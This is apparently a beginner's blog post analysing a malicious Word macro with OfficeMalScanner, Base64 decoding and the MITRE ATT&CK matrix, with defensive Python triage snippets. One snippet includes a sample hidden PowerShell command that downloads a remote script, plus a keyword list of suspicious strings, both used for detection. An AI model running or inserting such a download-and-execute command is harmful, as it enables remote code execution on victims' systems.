Malware Analysis of a Microsoft Word document with embedded macro

James Santiago
Oct 3, 2020


What this article is about:

This post records the preliminary analysis of a malware sample. Its goal is threefold:

(1) to give a quick basic snapshot of the steps involved in one form of static analysis

(2) to show how much can be learned in a quick 30–60 minutes of work

(3) to inspire others who are considering entering the malware analysis field.

What this article is not:

This article will not provide a complete, end-to-end analysis of a malware sample. Nor will it explain the basics of virtual machines (VMs) or of terms such as PowerShell, Base64 encoding, OfficeMalScanner, or Visual Basic (VB).

Analyzing the Malware Sample (PurpleFlower.docx):

With the introduction and disclaimer out of the way, let us get on with the main topic. The analysis followed the sequence of steps shown in Fig. 1:

Figure 1: Steps followed in the analysis

Almost all articles on malware analysis recommend doing the analysis in an isolated environment. Following that advice, this analysis was done in a Windows 7 appliance running in VirtualBox.

The Windows 7 appliance should have OfficeMalScanner installed. OfficeMalScanner is a quick way to scan Office documents for shellcode and encrypted Portable Executable files (e.g., .exe, .dll), and to pull macro code out of infected documents (ref. 1).

Figure 2: Using OfficeMalScanner

OfficeMalScanner tells us in a single run whether the Office document has any embedded VBA code in it, and extracts the code into a small file (‘ThisDocument’) (Fig. 2).
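As a complement to this step, the container type of a suspicious file can be checked without opening it in Office. The sketch below is not how OfficeMalScanner works internally; it is a minimal standard-library triage that relies on two well-known facts: legacy Office files start with the OLE2 compound-file signature, and newer Office files are ZIP archives in which VBA code normally lives in a part named `vbaProject.bin`. The function name `triage_office_file` is made up for this illustration.

```python
import zipfile

# File signatures ("magic bytes") at offset 0.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # legacy .doc/.xls compound file
ZIP_MAGIC = b"PK\x03\x04"                      # OOXML (.docx/.docm) is a ZIP archive


def triage_office_file(path):
    """Return (container, vba_parts) without opening the file in Office.

    Hypothetical helper for illustration; it does not extract macro code.
    """
    with open(path, "rb") as handle:
        header = handle.read(8)

    if header.startswith(OLE_MAGIC):
        # OLE storages need a dedicated parser, so only the type is reported.
        return "ole", []

    if header.startswith(ZIP_MAGIC) and zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as archive:
            vba_parts = [name for name in archive.namelist()
                         if name.lower().endswith("vbaproject.bin")]
        return "ooxml", vba_parts

    return "unknown", []
```

A result of `("ole", [])` means a tool such as OfficeMalScanner is still needed to find and extract any macros. A non-empty list in the `"ooxml"` case is a strong hint that the document carries VBA code.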

We can then use a text editor such as Notepad++ to look at this small file. At first glance it was hard to make head or tail of it. Choosing the Visual Basic option in the Notepad++ ‘Language’ menu turns on syntax highlighting, which makes the code much easier to read.

Figure 3: A sample of the code (output from OfficeMalScanner) as viewed in a text editor

At this point we don’t know what the code is up to (Fig. 3), but we get a sense that it intends to download a specific file from some URL onto the victim’s machine. We move on to look at the rest of the VB code.

Figure 4: Moving along in text editor, looking at the code from ‘ThisDocument’

Variables named ‘x’ and ‘y’ are declared (Fig. 4). What is shown above is a small part of the VB code. The text in orange and the sample in green do not look like code, but like some form of encoded information.

We use www.base64decode.org to decode this from Base64 to ASCII text. The text in orange decodes to the output shown in Fig. 5. The IP address in the figure has been masked to maintain anonymity.
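The same decoding can be done locally inside the analysis VM. The sketch below uses only Python's standard `base64` module. The function name `decode_base64_text` and the UTF-16 check are my own additions, not part of the original workflow. The check is there because PowerShell's `-EncodedCommand` option expects UTF-16LE text, which appears as a zero byte after every ASCII character, so some payloads look garbled if decoded as plain ASCII.

```python
import base64
import binascii


def decode_base64_text(blob):
    """Decode a Base64 string and return it as readable text."""
    compact = "".join(blob.split())  # drop line breaks and spaces
    try:
        raw = base64.b64decode(compact, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not valid Base64: {exc}") from exc

    # Heuristic (an assumption, not a rule): many zero bytes in the odd
    # positions suggest UTF-16LE rather than plain ASCII.
    if raw and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("ascii", errors="replace")


print(decode_base64_text("aGVsbG8gd29ybGQ="))  # prints "hello world"
```

The harmless string in the last line stands in for the real payload, which is not reproduced here.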

Figure 5: A piece of decoded output of the file from OfficeMalScanner

Going back to understand what this piece of code is doing: it appears to let the malware run its PowerShell commands in a window hidden from the user. But what is the purpose of the IP address? We see the word ‘DownloadString’. Recall the first piece of code we saw, which looked like it was meant to download a file from some URL. Is that connected to these Base64-encoded lines? At this point we don’t know.
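Spotting these clues by eye works for a short snippet, but a few regular expressions can pull them out of longer decoded text. The sketch below is a minimal illustration. The keyword list, the function name `find_indicators` and the sample command line are assumptions of mine, and the IP address comes from the 192.0.2.0/24 range reserved for documentation. It is not the address from the sample.

```python
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

# Hypothetical starter list of strings worth a second look.
KEYWORDS = ("DownloadString", "DownloadFile", "-WindowStyle Hidden", "DllImport")


def find_indicators(decoded_text):
    """Collect IP addresses, URLs and suspicious keywords from decoded text."""
    lowered = decoded_text.lower()
    return {
        "ips": sorted(set(IPV4_RE.findall(decoded_text))),
        "urls": sorted(set(URL_RE.findall(decoded_text))),
        "keywords": [kw for kw in KEYWORDS if kw.lower() in lowered],
    }


# Made-up stand-in for the decoded output; not the real sample.
SAMPLE = ("powershell -WindowStyle Hidden -Command "
          "\"(New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\"")

for kind, values in find_indicators(SAMPLE).items():
    print(kind, values)
```

For the stand-in string this reports one IP address, one URL and two keywords (‘DownloadString’ and ‘-WindowStyle Hidden’). The IP pattern is deliberately loose and will also match things like version numbers, so hits still need a human look.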

We move on to decode the material in green (Fig. 4). Only a small piece of it is shown in the figure above. This part (‘Dim x’) contains characters that are not Base64 data, such as ‘&’ (ampersand), ‘_’ (underscore) and the double quotes around each string. These are VB syntax for joining strings across lines. After removing them and feeding the result into www.base64decode.org we get some output, part of which is shown in Figure 6.
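The manual clean-up described here can be approximated in a few lines of Python. Instead of deleting ‘&’, ‘_’ and quotes one by one, the sketch below keeps only what sits between double quotes and joins the pieces in order. The function names and the tiny VB fragment are made up for illustration, and the approach assumes that every string literal in the text passed in belongs to the same payload.

```python
import base64
import re

# Matches the contents of each double-quoted VB string literal.
STRING_LITERAL_RE = re.compile(r'"([^"]*)"')


def join_vba_string_literals(vba_source):
    """Concatenate every double-quoted literal, in order of appearance."""
    return "".join(STRING_LITERAL_RE.findall(vba_source))


def decode_vba_payload(vba_source):
    """Rebuild the Base64 payload from VB source and decode it to bytes."""
    payload = join_vba_string_literals(vba_source)
    return base64.b64decode(payload, validate=True)


# Hypothetical fragment in the style of the macro; the payload is harmless.
SAMPLE_VBA = '''
Dim x
x = "aGVsbG8g" & _
    "d29ybGQ="
'''

print(decode_vba_payload(SAMPLE_VBA))  # prints b'hello world'
```

In practice, only the lines that build one variable (for example just the ‘x’ assignments) should be passed in, so that unrelated strings from elsewhere in the macro do not end up in the payload.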

Figure 6: Output from OfficeMalScanner decoded from Base64 to ASCII

Understanding this part of the PowerShell (Fig. 6) is not straightforward, let alone explaining it here. We’ll reserve that for a future article.

Big Picture

Even when new to looking at malware, it helps to zoom out and get the big picture. We know that the malware is an Office document with embedded VB code. To get the big picture we go to https://attack.mitre.org/ and look at the ATT&CK matrix. At first sight it is a daunting table (Fig. 7). Since we have not done a complete analysis of this malware, we focus on just the first three tactics (tactics are the columns of the matrix).

The malware sample was provided by MalTrak, so we don’t know how it was delivered to a victim in real life. The file was 2 MB in size, and I find it hard to believe it was sent as an email attachment. Let’s look at the first column of the matrix, the ‘Initial Access’ tactic, and go down the column. Each entry is a technique used by attackers. Two look like possibilities: ‘Spearphishing Attachment’ and ‘Supply Chain Compromise’. Large documents are often exchanged within a supply chain.

Figure 7: Fitting our sample in the MITRE ATT&CK framework

Looking at the 2nd column or 2nd tactic, ‘Execution’ — we can easily say it was PowerShell. Other techniques in this column may apply, but we’ll keep it simple for now.

Looking at the 3rd column or 3rd tactic, ‘Persistence’, it’s a long list, with lots of terms that we may not have come across. Let’s persist and look through it. Could ‘External Remote Services’ apply? Recall that the script was connecting to a malicious URL and downloading a file from there. ‘Office Application Startup’ is a good candidate as well. Could ‘AppInit DLL’ be one of the techniques, given that the PowerShell contained DllImport(“kernel32.dll”)? We don’t know at this point; we are merely speculating as an exercise.
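The tentative mapping across the three tactics can be kept as a small table of candidates, so that each guess stays tied to the observation behind it. The sketch below is only a note-taking aid. The technique IDs are not from the analysis above; I added them from the ATT&CK Enterprise matrix and they should be checked against https://attack.mitre.org/ before being relied on. The confidence labels are my own reading of the text.

```python
from collections import defaultdict

# (tactic, technique, ATT&CK ID, supporting observation, confidence)
# IDs are an addition for illustration; verify them on attack.mitre.org.
CANDIDATES = [
    ("Initial Access", "Spearphishing Attachment", "T1566.001",
     "malicious Office document", "possible"),
    ("Initial Access", "Supply Chain Compromise", "T1195",
     "large documents are exchanged in supply chains", "possible"),
    ("Execution", "PowerShell", "T1059.001",
     "macro launches PowerShell code", "likely"),
    ("Persistence", "External Remote Services", "T1133",
     "script contacts a remote address", "speculative"),
    ("Persistence", "Office Application Startup", "T1137",
     "code lives in an Office macro", "speculative"),
    ("Persistence", "AppInit DLLs", "T1546.010",
     "PowerShell contains DllImport of kernel32.dll", "speculative"),
]


def group_by_tactic(candidates):
    """Group candidate techniques under their tactic, keeping input order."""
    grouped = defaultdict(list)
    for tactic, technique, attack_id, evidence, confidence in candidates:
        grouped[tactic].append(
            f"{technique} ({attack_id}), {confidence}: {evidence}")
    return dict(grouped)


for tactic, entries in group_by_tactic(CANDIDATES).items():
    print(tactic)
    for entry in entries:
        print("  -", entry)
```

Writing the evidence next to each candidate makes it easy to strike out entries later, once a fuller analysis confirms or rules them out.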

We’ll call it good for now.

Summary

So what did we achieve so far? One might say nothing, but we did get a brief glimpse of how to take a quick look at a malware sample. In this case it was a macro embedded in an Office document. The document was checked using OfficeMalScanner in a VirtualBox VM, which extracted the macro code. We inspected the macro code in a text editor and used a decoder to convert the Base64 parts to ASCII. We then tried to make sense of the decoded text, which turned out to be PowerShell code. The macro is trying to execute PowerShell code, which is not a good sign. We also saw signs of an attempt to download something from an IP address, which is very suspicious unless it serves some known legitimate purpose. Finally, we got a quick glimpse of where this malware falls in the MITRE ATT&CK framework.

Final Words:

Well, I sort of lied when I said that the analysis could be done in 30–60 minutes. Although I had played with VMs in the past, the Windows 7 machine I used here took some time to set up correctly. Once that was out of the way, the rest went smoothly. I actually spent more like 2–3 hours, but only because I wanted to research each sub-topic further. With the environment already in place, the actual work can easily be done in 30–60 minutes.

Early on in this article it was mentioned that details of PowerShell, Base64 encoding, OfficeMalScanner, etc. would not be provided. Truth be told, a newcomer to the field can take comfort in knowing that only a very basic understanding of these is needed for a quick snapshot of this malware.

Being a new entrant, I expect there are mistakes in the approach I followed or in my interpretation. These are unintentional, and I hope the reader understands. Readers’ feedback is greatly appreciated.

Acknowledgment:

I would like to thank MalTrak for the Malware sample and preliminary instructions in Malware analysis. I would also like to thank Amr Thabet for his encouragement and initial review of the article.

References:

1) ‘Taking apart office automation documents with OfficeMalScanner’ by José Manuel Fernández, https://www.securityartwork.es/2015/02/02/taking-apart-office-automation-documents-with-officemalscanner/

2) ‘Malware Monday: OfficeMalScanner’ by MattB, https://medium.com/@bromiley/malware-monday-officemalscanner-b1e5f6417df6

3) https://attack.mitre.org/

4) The following online decoder was used for decoding from Base64 to ASCII text: https://www.base64decode.org/
